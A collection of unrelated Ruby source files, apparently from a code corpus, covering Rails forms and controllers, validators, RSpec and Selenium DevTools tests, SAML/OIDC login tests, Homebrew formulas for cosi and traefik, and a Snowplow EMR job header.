options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RI_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
fruit_sticker_ids: { renderer: :multi,
caption: 'Fruit Stickers',
options: @bom_repo.for_select_pm_products(
where: { pm_type_code: AppConst::PM_TYPE_STICKER }
),
selected: @form_object.fruit_sticker_ids,
required: false },
tu_sticker_ids: { renderer: :multi,
caption: 'TU Stickers',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_TU_STICKER }
),
selected: @form_object.tu_sticker_ids,
required: false },
ru_sticker_ids: { renderer: :multi,
caption: 'RU Stickers',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RU_STICKER }
),
selected: @form_object.ru_sticker_ids,
required: false }
}
end
def make_form_object
if @mode == :new
make_new_form_object
return
end
form_object_merge!(@repo.find_packing_specification_item(@options[:id]))
end
def make_new_form_object
@form_object = OpenStruct.new(product_setup_template_id: nil,
description: nil,
pm_bom_id: nil,
pm_mark_id: nil,
mark_id: nil,
product_setup_id: nil,
std_fruit_size_count_id: nil,
basic_pack_code_id: nil,
tu_labour_product_id: nil,
ru_labour_product_id: nil,
fruit_sticker_ids: nil,
tu_sticker_ids: nil,
ru_sticker_ids: nil)
end
private
def add_behaviours
url = '/production/packing_specifications/packing_specification_items'
behaviours do |behaviour|
behaviour.dropdown_change :product_setup_template_id,
notify: [{ url: "#{url}/product_setup_template_changed" }]
behaviour.dropdown_change :product_setup_id,
notify: [{ url: "#{url}/product_setup_changed" }]
end
end
end
end
| 48.245614 | 111 | 0.505212 |
abbdf2e5b2ee49d1e7000453042383732ad9c058 | 635 | class ValidIntValidator < ActiveModel::EachValidator
def validate_each(record, attribute, value)
record.errors.add attribute, (options[:message] || "must be integer, array of integers, or range") unless
valid_int?(value)
end
private
def valid_int?(value)
integer_array?(value) || integer_or_range?(value)
end
# True when +value+ is (or, for a String, JSON-decodes to) a non-empty
# array whose members are all integers or integer ranges.
def integer_array?(value)
  parsed = value.is_a?(String) ? Sift::ValueParser.new(value: value).array_from_json : value
  parsed.is_a?(Array) && parsed.any? && parsed.all? { |v| integer_or_range?(v) }
end
# True for plain integers ("42") and exclusive ranges ("1...10").
#
# Fix: the previous pattern /\A\d+(...\d+)?\z/ left the dots unescaped,
# so they matched ANY three characters and garbage such as "1abc10" was
# accepted as a "range". The dots are now escaped so only a literal
# "..." separates the two integers.
def integer_or_range?(value)
  !!(/\A\d+(\.\.\.\d+)?\z/ =~ value.to_s)
end
end
| 25.4 | 109 | 0.672441 |
e852757385cbf5b3097645fba7f1d313c19c3589 | 1,398 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
# Specs for IO#print: writes $_ (or each argument via #to_s) to the
# stream, appending the output record separator $\ when one is set.
describe IO, "#print" do
  before :each do
    # Install a known output record separator so its emission can be asserted.
    @old_separator = $\
    $\ = '->'
    @name = tmp("io_print")
  end

  after :each do
    # Restore the global separator and remove the scratch file.
    $\ = @old_separator
    rm_r @name
  end

  it "writes $_.to_s followed by $\\ (if any) to the stream if no arguments given" do
    o = mock('o')
    o.should_receive(:to_s).and_return("mockmockmock")
    $_ = o
    touch(@name) { |f| f.print }
    IO.read(@name).should == "mockmockmock#{$\}"

    # Set $_ to something known
    string = File.open(__FILE__) {|f| f.gets }
    touch(@name) { |f| f.print }
    IO.read(@name).should == "#{string}#{$\}"
  end

  it "calls obj.to_s and not obj.to_str then writes the record separator" do
    o = mock('o')
    o.should_not_receive(:to_str)
    o.should_receive(:to_s).and_return("hello")
    touch(@name) { |f| f.print(o) }
    IO.read(@name).should == "hello#{$\}"
  end

  it "writes each obj.to_s to the stream and appends $\\ (if any) given multiple objects" do
    o, o2 = Object.new, Object.new
    def o.to_s(); 'o'; end
    def o2.to_s(); 'o2'; end
    touch(@name) { |f| f.print(o, o2) }
    IO.read(@name).should == "#{o.to_s}#{o2.to_s}#{$\}"
  end

  it "raises IOError on closed stream" do
    lambda { IOSpecs.closed_io.print("stuff") }.should raise_error(IOError)
  end
end
| 25.418182 | 92 | 0.603004 |
614b0cc17b1d09e6aa1f482655bf20d5fba5f901 | 3,436 | require "language/go"
# Homebrew formula for CoSi, a collective-signing tool from the DEDIS lab.
class Cosi < Formula
  desc "Implementation of scalable collective signing"
  homepage "https://github.com/dedis/cosi"
  url "https://github.com/dedis/cosi/archive/0.8.6.tar.gz"
  sha256 "007e4c4def13fcecf7301d86f177f098c583151c8a3d940ccb4c65a84413a9eb"
  license "AGPL-3.0"

  bottle do
    cellar :any_skip_relocation
    sha256 "30bbb457c0fb67ee264331e434068a4a747ece4cbc536cb75d289a06e93988e2" => :catalina
    sha256 "2ddd695441977b1cd435fbae28d9aa864d48b7a90ec24971348d91b5d0e551df" => :mojave
    sha256 "00663999a04ee29f52e334022cc828d7ebe89a442f1e713afb2167112f4ebf75" => :high_sierra
  end

  depends_on "go" => :build

  # Vendored Go dependencies pinned to exact revisions (pre-Go-modules
  # GOPATH style, staged via Language::Go below).
  go_resource "github.com/BurntSushi/toml" do
    url "https://github.com/BurntSushi/toml.git",
        :revision => "f0aeabca5a127c4078abb8c8d64298b147264b55"
  end

  go_resource "github.com/daviddengcn/go-colortext" do
    url "https://github.com/daviddengcn/go-colortext.git",
        :revision => "511bcaf42ccd42c38aba7427b6673277bf19e2a1"
  end

  go_resource "github.com/dedis/crypto" do
    url "https://github.com/dedis/crypto.git",
        :revision => "d9272cb478c0942e1d60049e6df219cba2067fcd"
  end

  go_resource "github.com/dedis/protobuf" do
    url "https://github.com/dedis/protobuf.git",
        :revision => "6948fbd96a0f1e4e96582003261cf647dc66c831"
  end

  go_resource "github.com/montanaflynn/stats" do
    url "https://github.com/montanaflynn/stats.git",
        :revision => "60dcacf48f43d6dd654d0ed94120ff5806c5ca5c"
  end

  go_resource "github.com/satori/go.uuid" do
    url "https://github.com/satori/go.uuid.git",
        :revision => "f9ab0dce87d815821e221626b772e3475a0d2749"
  end

  go_resource "golang.org/x/net" do
    url "https://go.googlesource.com/net.git",
        :revision => "0c607074acd38c5f23d1344dfe74c977464d1257"
  end

  go_resource "gopkg.in/codegangsta/cli.v1" do
    url "https://gopkg.in/codegangsta/cli.v1.git",
        :revision => "01857ac33766ce0c93856370626f9799281c14f4"
  end

  go_resource "gopkg.in/dedis/cothority.v0" do
    url "https://gopkg.in/dedis/cothority.v0.git",
        :revision => "e5eb384290e5fd98b8cb150a1348661aa2d49e2a"
  end

  def install
    # Emulate a GOPATH layout: the formula source must live under
    # src/github.com/dedis/cosi for the import paths to resolve.
    mkdir_p buildpath/"src/github.com/dedis"
    ln_s buildpath, buildpath/"src/github.com/dedis/cosi"
    ENV["GOPATH"] = "#{buildpath}/Godeps/_workspace:#{buildpath}"
    Language::Go.stage_deps resources, buildpath/"src"
    system "go", "build", "-o", "cosi"
    prefix.install "dedis_group.toml"
    bin.install "cosi"
  end

  test do
    port = free_port
    # Minimal server identity (keypair + listen address) for a one-node run.
    (testpath/"config.toml").write <<~EOS
      Public = "7b6d6361686d0c76d9f4b40961736eb5d0849f7db3f8bfd8f869b8015d831d45"
      Private = "01a80f4fef21db2aea18e5288fe9aa71324a8ad202609139e5cfffc4ffdc4484"
      Addresses = ["0.0.0.0:#{port}"]
    EOS
    # Group roster pointing at the local server started below.
    (testpath/"group.toml").write <<~EOS
      [[servers]]
      Addresses = ["127.0.0.1:#{port}"]
      Public = "e21jYWhtDHbZ9LQJYXNutdCEn32z+L/Y+Gm4AV2DHUU="
    EOS
    begin
      file = prefix/"README.md"
      sig = "README.sig"
      pid = fork { exec bin/"cosi", "server", "-config", "config.toml" }
      sleep 2
      assert_match "Success", shell_output("#{bin}/cosi check -g group.toml")
      # Round-trip: sign a file with the group, then verify the signature.
      system bin/"cosi", "sign", "-g", "group.toml", "-o", sig, file
      out = shell_output("#{bin}/cosi verify -g group.toml -s #{sig} #{file}")
      assert_match "OK", out
    ensure
      Process.kill("TERM", pid)
    end
  end
end
| 33.359223 | 93 | 0.701688 |
bb476c413c9c2ac23c9c72f3e40e83ca050d0e5b | 535 | class ScreenshotJob < ApplicationJob
include SuckerPunch::Job
# Captures a screenshot of the sandbox preview, attaches it to the
# record, then removes the temporary file from disk.
def perform(sandbox)
  capture = screenshot(sandbox)
  sandbox.screenshot.attach(io: capture, filename: 'screenshot.jpg')
  sandbox.save!
  File.delete(capture)
end
# Renders the sandbox preview page in a headless browser and saves a
# screenshot named "<sandbox id>.jpg" in the working directory.
# Returns an open File handle on the captured image.
#
# Fix: the browser is now quit in an +ensure+ block, so a failure in
# +goto+ or +screenshot+ no longer leaks the headless browser process.
def screenshot(sandbox)
  path = sandbox.id + '.jpg'
  browser = Ferrum::Browser.new(window_size: [600, 300])
  begin
    browser.goto("#{ENV["RAILS_HOST_PROTOCOL"]}://#{ENV["RAILS_HOST"]}/sandbox/#{sandbox.id}/preview")
    browser.screenshot(path: path)
  ensure
    browser.quit
  end
  File.new(path)
end
end
| 24.318182 | 102 | 0.685981 |
ab7e3586e6a5c278a63ed331d5e6e7fc2e112eb5 | 725 | class Admin::PricesController < Admin::ProductController
before_action :_fetch_product
# GET new: prepares an empty Price for the form.
def new
  @price = Price.new
end
# POST create: builds a Price from the permitted params, scopes it to the
# current product, and redirects on success or re-renders the form.
def create
  @price = Price.new(_price_params)
  @price.product_id = @product.id
  return redirect_to(admin_product_prices_path) if @price.save

  render 'new'
end
# GET edit: loads the Price being edited.
def edit
  @price = Price.find params[:id]
end
# PATCH/PUT update: applies the permitted params and redirects on
# success or re-renders the edit form.
def update
  @price = Price.find(params[:id])
  return redirect_to(admin_product_prices_path) if @price.update(_price_params)

  render 'edit'
end
# DELETE destroy: removes the Price and returns to the index.
def destroy
  Price.destroy params[:id]
  redirect_to admin_product_prices_path
end
private
# Strong parameters: only :flag and :value may be mass-assigned.
def _price_params
  params.require(:price).permit(:flag, :value)
end
end
| 20.714286 | 56 | 0.686897 |
f73b80b3c65e64260ea3a4b1c3d54dd898207b7e | 9,657 | # frozen_string_literal: true
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require_relative 'spec_helper'
module Selenium
  module WebDriver
    # Integration specs for the Chrome DevTools Protocol (CDP) bridge:
    # raw commands/events, HTTP auth interception, console/exception/DOM
    # event listeners, network request/response interception, and pinned
    # scripts. Runs only on CDP-capable browsers.
    describe DevTools, exclusive: {browser: %i[chrome edge firefox_nightly]} do
      after { reset_driver! }

      it 'sends commands' do
        driver.devtools.page.navigate(url: url_for('xhtmlTest.html'))
        expect(driver.title).to eq("XHTML Test Page")
      end

      it 'supports events' do
        callback = instance_double(Proc, call: nil)

        driver.devtools.page.enable
        driver.devtools.page.on(:load_event_fired) { callback.call }
        driver.navigate.to url_for('xhtmlTest.html')
        # CDP events arrive asynchronously; give the listener time to fire.
        sleep 0.5

        expect(callback).to have_received(:call).at_least(:once)
      end

      it 'propagates errors in events' do
        driver.devtools.page.enable
        driver.devtools.page.on(:load_event_fired) { raise "This is fine!" }
        expect { driver.navigate.to url_for('xhtmlTest.html') }.to raise_error(RuntimeError, "This is fine!")
      end

      context 'authentication', except: {browser: :firefox_nightly,
                                         reason: 'Fetch.enable is not yet supported'} do
        let(:username) { SpecSupport::RackServer::TestApp::BASIC_AUTH_CREDENTIALS.first }
        let(:password) { SpecSupport::RackServer::TestApp::BASIC_AUTH_CREDENTIALS.last }

        it 'on any request' do
          driver.register(username: username, password: password)

          driver.navigate.to url_for('basicAuth')
          expect(driver.find_element(tag_name: 'h1').text).to eq('authorized')
        end

        it 'based on URL' do
          auth_url = url_for('basicAuth')
          driver.register(username: username, password: password, uri: /localhost/)

          # Same page via a non-matching host: credentials must NOT be sent.
          driver.navigate.to auth_url.sub('localhost', '127.0.0.1')
          expect { driver.find_element(tag_name: 'h1') }.to raise_error(Error::NoSuchElementError)

          driver.navigate.to auth_url
          expect(driver.find_element(tag_name: 'h1').text).to eq('authorized')
        end
      end

      it 'notifies about log messages' do
        logs = []
        driver.on_log_event(:console) { |log| logs.push(log) }
        driver.navigate.to url_for('javascriptPage.html')

        driver.execute_script("console.log('I like cheese');")
        sleep 0.5
        driver.execute_script("console.log(true);")
        sleep 0.5
        driver.execute_script("console.log(null);")
        sleep 0.5
        driver.execute_script("console.log(undefined);")
        sleep 0.5
        driver.execute_script("console.log(document);")
        sleep 0.5

        expect(logs).to include(
          an_object_having_attributes(type: :log, args: ['I like cheese']),
          an_object_having_attributes(type: :log, args: [true]),
          an_object_having_attributes(type: :log, args: [nil]),
          an_object_having_attributes(type: :log, args: [{'type' => 'undefined'}])
        )
      end

      it 'notifies about document log messages', except: {browser: :firefox_nightly,
                                                          reason: 'Firefox & Chrome parse document differently'} do
        logs = []
        driver.on_log_event(:console) { |log| logs.push(log) }
        driver.navigate.to url_for('javascriptPage.html')

        driver.execute_script("console.log(document);")
        wait.until { !logs.empty? }

        expect(logs).to include(
          an_object_having_attributes(type: :log, args: [hash_including('type' => 'object')])
        )
      end

      it 'notifies about document log messages', only: {browser: :firefox_nightly,
                                                        reason: 'Firefox & Chrome parse document differently'} do
        logs = []
        driver.on_log_event(:console) { |log| logs.push(log) }
        driver.navigate.to url_for('javascriptPage.html')

        driver.execute_script("console.log(document);")
        wait.until { !logs.empty? }

        expect(logs).to include(
          an_object_having_attributes(type: :log, args: [hash_including('location')])
        )
      end

      it 'notifies about exceptions' do
        exceptions = []
        driver.on_log_event(:exception) { |exception| exceptions.push(exception) }
        driver.navigate.to url_for('javascriptPage.html')

        driver.find_element(id: 'throwing-mouseover').click
        wait.until { exceptions.any? }

        exception = exceptions.first
        expect(exception.description).to include('Error: I like cheese')
        expect(exception.stacktrace).not_to be_empty
      end

      it 'notifies about DOM mutations', except: {browser: :firefox_nightly,
                                                  reason: 'Runtime.addBinding not yet supported'} do
        mutations = []
        driver.on_log_event(:mutation) { |mutation| mutations.push(mutation) }
        driver.navigate.to url_for('dynamic.html')

        driver.find_element(id: 'reveal').click
        wait.until { mutations.any? }

        mutation = mutations.first
        expect(mutation.element).to eq(driver.find_element(id: 'revealed'))
        expect(mutation.attribute_name).to eq('style')
        expect(mutation.current_value).to eq('')
        expect(mutation.old_value).to eq('display:none;')
      end

      context 'network interception', except: {browser: :firefox_nightly,
                                               reason: 'Fetch.enable is not yet supported'} do
        it 'continues requests' do
          requests = []
          driver.intercept do |request, &continue|
            requests << request
            continue.call(request)
          end
          driver.navigate.to url_for('html5Page.html')
          expect(driver.title).to eq('HTML5')
          expect(requests).not_to be_empty
        end

        it 'changes requests' do
          # Rewrite requests for one.js to fetch two.js instead; the page
          # then renders the content provided by two.js.
          driver.intercept do |request, &continue|
            uri = URI(request.url)
            if uri.path.end_with?('one.js')
              uri.path = '/devtools_request_interception_test/two.js'
              request.url = uri.to_s
            end
            continue.call(request)
          end
          driver.navigate.to url_for('devToolsRequestInterceptionTest.html')
          driver.find_element(tag_name: 'button').click
          expect(driver.find_element(id: 'result').text).to eq('two')
        end

        it 'continues responses' do
          responses = []
          driver.intercept do |request, &continue|
            continue.call(request) do |response|
              responses << response
            end
          end
          driver.navigate.to url_for('html5Page.html')
          expect(driver.title).to eq('HTML5')
          expect(responses).not_to be_empty
        end

        it 'changes responses' do
          driver.intercept do |request, &continue|
            continue.call(request) do |response|
              response.body << '<h4 id="appended">Appended!</h4>' if request.url.include?('html5Page.html')
            end
          end
          driver.navigate.to url_for('html5Page.html')
          expect(driver.find_elements(id: "appended")).not_to be_empty
        end
      end

      context 'script pinning' do
        before do
          driver.navigate.to url_for('xhtmlTest.html')
        end

        it 'allows to pin script' do
          script = driver.pin_script('return document.title;')
          expect(driver.pinned_scripts).to eq([script])
          expect(driver.execute_script(script)).to eq('XHTML Test Page')
        end

        it 'ensures pinned script is available on new pages' do
          script = driver.pin_script('return document.title;')
          driver.navigate.to url_for('formPage.html')
          expect(driver.execute_script(script)).to eq('We Leave From Here')
        end

        it 'allows to unpin script' do
          script = driver.pin_script('return document.title;')
          driver.unpin_script(script)
          expect(driver.pinned_scripts).to be_empty
          expect { driver.execute_script(script) }.to raise_error(Error::JavascriptError)
        end

        it 'ensures unpinned scripts are not available on new pages' do
          script = driver.pin_script('return document.title;')
          driver.unpin_script(script)
          driver.navigate.to url_for('formPage.html')
          expect { driver.execute_script(script) }.to raise_error(Error::JavascriptError)
        end

        it 'handles arguments in pinned script' do
          script = driver.pin_script('return arguments;')
          element = driver.find_element(id: 'id1')
          expect(driver.execute_script(script, 1, true, element)).to eq([1, true, element])
        end

        it 'supports async pinned scripts' do
          script = driver.pin_script('arguments[0]()')
          expect { driver.execute_async_script(script) }.not_to raise_error
        end
      end
    end
  end
end
| 38.783133 | 115 | 0.623175 |
4a6f7ab3fcbb976495bc67e7602668a0084d6762 | 6,822 | shared_examples 'sp handoff after identity verification' do |sp|
include SamlAuthHelper
include IdvHelper
let(:email) { '[email protected]' }
context 'sign up' do
let(:user) { User.find_with_email(email) }
it 'requires idv and hands off correctly' do
visit_idp_from_sp_with_ial2(sp)
register_user(email)
expect(current_path).to eq idv_jurisdiction_path
fill_out_idv_jurisdiction_ok
click_idv_continue
expect(current_path).to eq idv_session_path
complete_idv_profile_ok(user)
click_acknowledge_personal_key
expect(page).to have_content t(
'titles.sign_up.verified',
app: APP_NAME,
)
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect(user.events.account_verified.size).to be(1)
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'unverified user sign in' do
let(:user) { user_with_2fa }
it 'requires idv and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
expect(current_path).to eq idv_jurisdiction_path
fill_out_idv_jurisdiction_ok
click_idv_continue
complete_idv_profile_ok(user)
click_acknowledge_personal_key
expect(page).to have_content t(
'titles.sign_up.verified',
app: APP_NAME,
)
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect(user.events.account_verified.size).to be(1)
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'verified user sign in' do
let(:user) { user_with_2fa }
before do
sign_in_and_2fa_user(user)
visit idv_session_path
complete_idv_profile_ok(user)
click_acknowledge_personal_key
first(:link, t('links.sign_out')).click
end
it 'does not require verification and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'second time a user signs in to an SP' do
let(:user) { user_with_2fa }
before do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
fill_out_idv_jurisdiction_ok
click_idv_continue
complete_idv_profile_ok(user)
click_acknowledge_personal_key
click_on I18n.t('forms.buttons.continue')
visit account_path
first(:link, t('links.sign_out')).click
end
it 'does not require idv or requested attribute verification and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
expect_csp_headers_to_be_present if sp == :oidc
fill_in_code_with_last_phone_otp
click_submit_default
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
# Asserts the IdP response restricts form submission targets to itself
# and the test SP via the Content-Security-Policy header.
def expect_csp_headers_to_be_present
  csp = page.response_headers['Content-Security-Policy']
  expect(csp).to include('form-action \'self\' http://localhost:7654')
end
# Verifies the full OIDC handoff: the redirect back to the SP, the token
# exchange authenticated with a signed JWT client assertion, the id_token
# claims, and the userinfo endpoint response.
def expect_successful_oidc_handoff
  redirect_uri = URI(current_url)
  redirect_params = Rack::Utils.parse_query(redirect_uri.query).with_indifferent_access

  expect(redirect_uri.to_s).to start_with('http://localhost:7654/auth/result')
  expect(redirect_params[:state]).to eq(@state)

  code = redirect_params[:code]
  expect(code).to be_present

  # private_key_jwt client authentication (RFC 7523 assertion).
  jwt_payload = {
    iss: @client_id,
    sub: @client_id,
    aud: api_openid_connect_token_url,
    jti: SecureRandom.hex,
    exp: 5.minutes.from_now.to_i,
  }

  client_assertion = JWT.encode(jwt_payload, client_private_key, 'RS256')
  client_assertion_type = 'urn:ietf:params:oauth:client-assertion-type:jwt-bearer'

  page.driver.post api_openid_connect_token_path,
                   grant_type: 'authorization_code',
                   code: code,
                   client_assertion_type: client_assertion_type,
                   client_assertion: client_assertion

  expect(page.status_code).to eq(200)
  token_response = JSON.parse(page.body).with_indifferent_access

  id_token = token_response[:id_token]
  expect(id_token).to be_present

  # Validate the id_token signature against the IdP's published JWKS.
  decoded_id_token, _headers = JWT.decode(
    id_token, sp_public_key, true, algorithm: 'RS256'
  ).map(&:with_indifferent_access)

  sub = decoded_id_token[:sub]
  expect(sub).to be_present
  expect(decoded_id_token[:nonce]).to eq(@nonce)
  expect(decoded_id_token[:aud]).to eq(@client_id)
  expect(decoded_id_token[:acr]).to eq(Saml::Idp::Constants::IAL2_AUTHN_CONTEXT_CLASSREF)
  expect(decoded_id_token[:iss]).to eq(root_url)
  expect(decoded_id_token[:email]).to eq(user.email)
  expect(decoded_id_token[:given_name]).to eq('José')
  expect(decoded_id_token[:social_security_number]).to eq('666-66-1234')

  access_token = token_response[:access_token]
  expect(access_token).to be_present

  page.driver.get api_openid_connect_userinfo_path,
                  {},
                  'HTTP_AUTHORIZATION' => "Bearer #{access_token}"

  userinfo_response = JSON.parse(page.body).with_indifferent_access
  expect(userinfo_response[:sub]).to eq(sub)
  expect(AgencyIdentity.where(user_id: user.id, agency_id: 2).first.uuid).to eq(sub)
  expect(userinfo_response[:email]).to eq(user.email)
  expect(userinfo_response[:given_name]).to eq('José')
  expect(userinfo_response[:social_security_number]).to eq('666-66-1234')
end
# Verifies the SAML handoff: the asserted UUID matches the user's agency
# identity, the browser landed back on the original AuthnRequest URL, and
# the assertion carries the verified phone from the active profile's PII.
def expect_successful_saml_handoff
  profile_phone = user.active_profile.decrypt_pii(Features::SessionHelper::VALID_PASSWORD).phone
  xmldoc = SamlResponseDoc.new('feature', 'response_assertion')

  expect(AgencyIdentity.where(user_id: user.id, agency_id: 2).first.uuid).to eq(xmldoc.uuid)
  expect(current_url).to eq @saml_authn_request
  expect(xmldoc.phone_number.children.children.to_s).to eq(profile_phone)
end
# The test SP's RSA private key, loaded once per example and memoized;
# used to sign the JWT client assertion for the token exchange.
def client_private_key
  @client_private_key ||= OpenSSL::PKey::RSA.new(
    File.read(Rails.root.join('keys', 'saml_test_sp.key')),
  )
end
# Fetches the IdP's JWKS endpoint and returns the first published key as
# an OpenSSL key, for verifying the id_token signature.
def sp_public_key
  page.driver.get api_openid_connect_certs_path
  expect(page.status_code).to eq(200)

  jwks = JSON.parse(page.body).with_indifferent_access
  JSON::JWK.new(jwks[:keys].first).to_key
end
end
| 31.293578 | 98 | 0.711228 |
bbbc2be14dc06965b3d841946ccf1cc2307fcde0 | 2,747 | class Traefik < Formula
desc "Modern reverse proxy"
homepage "https://traefik.io/"
url "https://github.com/traefik/traefik/releases/download/v2.6.1/traefik-v2.6.1.src.tar.gz"
sha256 "06c24b339c8896cd8c2a88f85b1d6851ee2fcf9186169a7ff9df0ec87a0ed35e"
license "MIT"
head "https://github.com/traefik/traefik.git", branch: "master"

bottle do
  sha256 cellar: :any_skip_relocation, arm64_monterey: "470f2e3cd8a59a2293a73c3aa61d2ec0bac5ade053abf9b3966d75090cb2f07e"
  sha256 cellar: :any_skip_relocation, arm64_big_sur:  "871ffc99145c7610f754f696a85dbd256e69fbf388d211357fe394bbddfd242d"
  sha256 cellar: :any_skip_relocation, monterey:       "41ba137ccea207ff7787772e64b0b79c5bcdc05f7591764f71b96c7b4eac568f"
  sha256 cellar: :any_skip_relocation, big_sur:        "c5c9ca94aabc889d34ecd8851297c6edf03c822e4091224f01a9d62636e724ac"
  sha256 cellar: :any_skip_relocation, catalina:       "19f1e5494136416b9a17df8024a55038cbc461997912d5fb4725bb28b5842cf6"
  sha256 cellar: :any_skip_relocation, x86_64_linux:   "1fb9e178336fa70d2b2d28b3a5e71a8157b7682faaedd979b88f1a97848a9876"
end

# go-bindata is needed by `go generate` to embed static assets.
depends_on "go" => :build
depends_on "go-bindata" => :build

# Fix build with Go 1.18.
# Remove with v2.7.
patch do
  url "https://github.com/traefik/traefik/commit/9297055ad8f651c751473b5fd4103eb224a8337e.patch?full_index=1"
  sha256 "b633710c7bde8737fbe0170066a765ee749f014d38afd06ef40085773e152fd0"
end
# Builds the traefik binary, stamping the release version into the
# binary via -ldflags and stripping debug info (-s -w).
def install
  version_flag = "-X github.com/traefik/traefik/v#{version.major}/pkg/version.Version=#{version}"
  ldflags = "-s -w #{version_flag}"

  system "go", "generate"
  system "go", "build", *std_go_args(ldflags: ldflags), "./cmd/traefik"
end
# Run traefik as a brew service using the config installed under etc.
service do
  run [opt_bin/"traefik", "--configfile=#{etc}/traefik/traefik.toml"]
  keep_alive false
  working_dir var
  log_path var/"log/traefik.log"
  error_log_path var/"log/traefik.log"
end

test do
  ui_port = free_port
  http_port = free_port

  # Minimal config: one HTTP entrypoint plus the insecure API dashboard.
  (testpath/"traefik.toml").write <<~EOS
    [entryPoints]
    [entryPoints.http]
    address = ":#{http_port}"
    [entryPoints.traefik]
    address = ":#{ui_port}"
    [api]
    insecure = true
    dashboard = true
  EOS

  begin
    pid = fork do
      exec bin/"traefik", "--configfile=#{testpath}/traefik.toml"
    end
    sleep 5

    # No routers configured, so the HTTP entrypoint answers 404...
    cmd_ui = "curl -sIm3 -XGET http://127.0.0.1:#{http_port}/"
    assert_match "404 Not Found", shell_output(cmd_ui)
    sleep 1
    # ...while the dashboard is served on the traefik entrypoint.
    cmd_ui = "curl -sIm3 -XGET http://127.0.0.1:#{ui_port}/dashboard/"
    assert_match "200 OK", shell_output(cmd_ui)
  ensure
    Process.kill(9, pid)
    Process.wait(pid)
  end

  assert_match version.to_s, shell_output("#{bin}/traefik version 2>&1")
end
end
| 35.217949 | 123 | 0.706589 |
08b935d3949f12bc926be4e3e421399f41042bca | 1,081 | # -*- coding: utf-8 -*-
require 'helper'
# Regression test: tables written alongside hyperlinks, comments and an
# image must produce the expected relationship ids (rIds) in the output
# workbook, byte-compared against a reference file.
class TestRegressionTable06 < Test::Unit::TestCase
  def setup
    setup_dir_var
  end

  def teardown
    File.delete(@xlsx) if File.exist?(@xlsx)
  end

  def test_table06
    @xlsx = 'table06.xlsx'
    workbook  = WriteXLSX.new(@xlsx)
    worksheet = workbook.add_worksheet

    # Match the column width of the target worksheet.
    worksheet.set_column('C:H', 10.288)

    # Add the tables.
    %w[C3:F13 F15:H20 C23:D30].each { |range| worksheet.add_table(range) }

    # Links to exercise rId handling.
    %w[A1 C1].each { |cell| worksheet.write(cell, 'http://perl.com/') }

    # Comments to exercise rId handling.
    worksheet.comments_author = 'John'
    worksheet.write_comment('H1', 'Test1')
    worksheet.write_comment('J1', 'Test2')

    # Drawing to exercise rId handling.
    worksheet.insert_image('A4', File.join(@test_dir, 'regression', 'images/blue.png'))

    workbook.close
    compare_xlsx_for_regression(File.join(@regression_output, @xlsx), @xlsx)
  end
end
| 25.738095 | 87 | 0.674376 |
7acb4f75119d281d76484296f75c0673e4cf379f | 60,757 | # Copyright (c) 2012-2020 Snowplow Analytics Ltd. All rights reserved.
#
# This program is licensed to you under the Apache License Version 2.0,
# and you may not use this file except in compliance with the Apache License Version 2.0.
# You may obtain a copy of the Apache License Version 2.0 at http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the Apache License Version 2.0 is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the Apache License Version 2.0 for the specific language governing permissions and limitations there under.
# Author:: Alex Dean (mailto:[email protected])
# Copyright:: Copyright (c) 2012-2020 Snowplow Analytics Ltd
# License:: Apache License Version 2.0
require 'set'
require 'elasticity'
require 'aws-sdk-s3'
require 'awrence'
require 'json'
require 'base64'
require 'contracts'
require 'iglu-client'
require 'securerandom'
require 'tempfile'
require 'rest-client'
# Ruby class to execute Snowplow's Hive jobs against Amazon EMR
# using Elasticity (https://github.com/rslifka/elasticity).
module Snowplow
module EmrEtlRunner
class EmrJob
include Contracts
# Constants
JAVA_PACKAGE = "com.snowplowanalytics.snowplow"
PARTFILE_REGEXP = ".*part-.*"
PARTFILE_GROUPBY_REGEXP = ".*(part-)\\d+-(.*)"
ATOMIC_EVENTS_PARTFILE_GROUPBY_REGEXP = ".*\/atomic-events\/(part-)\\d+-(.*)"
SHREDDED_TYPES_PARTFILE_GROUPBY_REGEXP = ".*\/shredded-types\/vendor=(.+)\/name=(.+)\/.+\/version=(.+)\/(part-)\\d+-(.*)"
SHREDDED_TSV_TYPES_PARTFILE_GROUPBY_REGEXP = ".*\/shredded-tsv\/vendor=(.+)\/name=(.+)\/.+\/version=(.+)\/(part-)\\d+-(.*)"
STREAM_ENRICH_REGEXP = ".*\.gz"
SUCCESS_REGEXP = ".*_SUCCESS"
